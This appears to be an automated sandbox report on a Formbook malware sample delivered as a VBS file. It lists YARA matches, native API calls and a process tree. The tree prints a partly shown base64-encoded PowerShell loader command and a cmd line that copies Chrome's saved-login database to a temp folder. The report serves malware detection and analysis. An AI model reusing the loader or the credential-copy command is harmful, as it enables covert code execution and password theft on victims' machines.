Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00D1CDF8 4_2_00D1CDF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00D1DED8 4_2_00D1DED8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07617E00 4_2_07617E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07617E00 4_2_07617E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD2EF7 18_2_1EDD2EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCD616 18_2_1EDCD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED26E30 18_2_1ED26E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1FF1 18_2_1EDD1FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCD466 18_2_1EDCD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1841F 18_2_1ED1841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD25DD 18_2_1EDD25DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1D5E0 18_2_1ED1D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32581 18_2_1ED32581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1D55 18_2_1EDD1D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD2D07 18_2_1EDD2D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED00D20 18_2_1ED00D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD22AE 18_2_1EDD22AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDCDBD2 18_2_1EDCDBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3EBB0 18_2_1ED3EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD2B28 18_2_1EDD2B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD28EC 18_2_1EDD28EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B090 18_2_1ED1B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD20A8 18_2_1EDD20A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC1002 18_2_1EDC1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0F900 18_2_1ED0F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 18_2_1ED24120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E841F 27_2_047E841F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489D466 27_2_0489D466
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A25DD 27_2_048A25DD
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D0D20 27_2_047D0D20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A2D07 27_2_048A2D07
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047ED5E0 27_2_047ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A1D55 27_2_048A1D55
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F6E30 27_2_047F6E30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A2EF7 27_2_048A2EF7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489D616 27_2_0489D616
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048ADFCE 27_2_048ADFCE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A1FF1 27_2_048A1FF1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A20A8 27_2_048A20A8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A28EC 27_2_048A28EC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891002 27_2_04891002
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048AE824 27_2_048AE824
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB090 27_2_047EB090
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DF900 27_2_047DF900
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A22AE 27_2_048A22AE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0488FA2B 27_2_0488FA2B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480EBB0 27_2_0480EBB0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAB40 27_2_047FAB40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048903DA 27_2_048903DA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489DBD2 27_2_0489DBD2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A2B28 27_2_048A2B28
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00632D8F 27_2_00632D8F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00632D90 27_2_00632D90
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00639E60 27_2_00639E60
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064DE6D 27_2_0064DE6D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00639E5C 27_2_00639E5C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D70F 27_2_0064D70F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00632FB0 27_2_00632FB0
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1ED0B150 appears 35 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 047DB150 appears 54 times
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_1ED496E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_1ED49660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk, 18_2_1ED49780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_1ED497A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk, 18_2_1ED49710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk, 18_2_1ED49540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk, 18_2_1ED49A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk, 18_2_1ED49A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk, 18_2_1ED49A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk, 18_2_1ED498F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk, 18_2_1ED49840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_1ED49860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk, 18_2_1ED499A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_1ED49910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496D0 NtCreateKey, 18_2_1ED496D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49650 NtQueryValueKey, 18_2_1ED49650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49670 NtQueryInformationProcess, 18_2_1ED49670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49610 NtEnumerateValueKey, 18_2_1ED49610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49FE0 NtCreateMutant, 18_2_1ED49FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4A770 NtOpenThread, 18_2_1ED4A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49770 NtSetInformationFile, 18_2_1ED49770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49760 NtOpenProcess, 18_2_1ED49760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4A710 NtOpenProcessToken, 18_2_1ED4A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49730 NtQueryVirtualMemory, 18_2_1ED49730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED495D0 NtClose, 18_2_1ED495D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED495F0 NtQueryInformationFile, 18_2_1ED495F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49560 NtWriteFile, 18_2_1ED49560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4AD30 NtSetContextThread, 18_2_1ED4AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49520 NtWaitForSingleObject, 18_2_1ED49520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A80 NtOpenDirectoryObject, 18_2_1ED49A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49A10 NtQuerySection, 18_2_1ED49A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4A3B0 NtGetContextThread, 18_2_1ED4A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49B00 NtSetValueKey, 18_2_1ED49B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED498A0 NtWriteVirtualMemory, 18_2_1ED498A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED4B040 NtSuspendThread, 18_2_1ED4B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49820 NtEnumerateKey, 18_2_1ED49820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED499D0 NtCreateProcessEx, 18_2_1ED499D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED49950 NtQueueApcThread, 18_2_1ED49950
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048195D0 NtClose,LdrInitializeThunk, 27_2_048195D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819540 NtReadFile,LdrInitializeThunk, 27_2_04819540
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819560 NtWriteFile,LdrInitializeThunk, 27_2_04819560
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk, 27_2_048196D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_048196E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk, 27_2_04819610
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk, 27_2_04819650
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk, 27_2_04819660
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk, 27_2_04819780
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk, 27_2_04819FE0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk, 27_2_04819710
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk, 27_2_04819770
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk, 27_2_04819840
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk, 27_2_04819860
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk, 27_2_048199A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk, 27_2_04819910
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk, 27_2_04819A50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk, 27_2_04819B00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048195F0 NtQueryInformationFile, 27_2_048195F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819520 NtWaitForSingleObject, 27_2_04819520
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481AD30 NtSetContextThread, 27_2_0481AD30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819670 NtQueryInformationProcess, 27_2_04819670
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048197A0 NtUnmapViewOfSection, 27_2_048197A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481A710 NtOpenProcessToken, 27_2_0481A710
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819730 NtQueryVirtualMemory, 27_2_04819730
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819760 NtOpenProcess, 27_2_04819760
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481A770 NtOpenThread, 27_2_0481A770
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048198A0 NtWriteVirtualMemory, 27_2_048198A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048198F0 NtReadVirtualMemory, 27_2_048198F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819820 NtEnumerateKey, 27_2_04819820
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481B040 NtSuspendThread, 27_2_0481B040
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048199D0 NtCreateProcessEx, 27_2_048199D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819950 NtQueueApcThread, 27_2_04819950
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A80 NtOpenDirectoryObject, 27_2_04819A80
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A00 NtProtectVirtualMemory, 27_2_04819A00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A10 NtQuerySection, 27_2_04819A10
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04819A20 NtResumeThread, 27_2_04819A20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0481A3B0 NtGetContextThread, 27_2_0481A3B0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A370 NtCreateFile, 27_2_0064A370
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A420 NtReadFile, 27_2_0064A420
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A4A0 NtClose, 27_2_0064A4A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A550 NtAllocateVirtualMemory, 27_2_0064A550
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A36B NtCreateFile, 27_2_0064A36B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A41A NtReadFile, 27_2_0064A41A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A49A NtClose, 27_2_0064A49A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064A54B NtAllocateVirtualMemory, 27_2_0064A54B
Java / VBScript file with very long strings (likely obfuscated code)
Source: MTIR22024323_0553381487_20220112120005.vbs Initial sample: Strings found which are bigger than 50
Source: MTIR22024323_0553381487_20220112120005.vbs ReversingLabs: Detection: 12%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 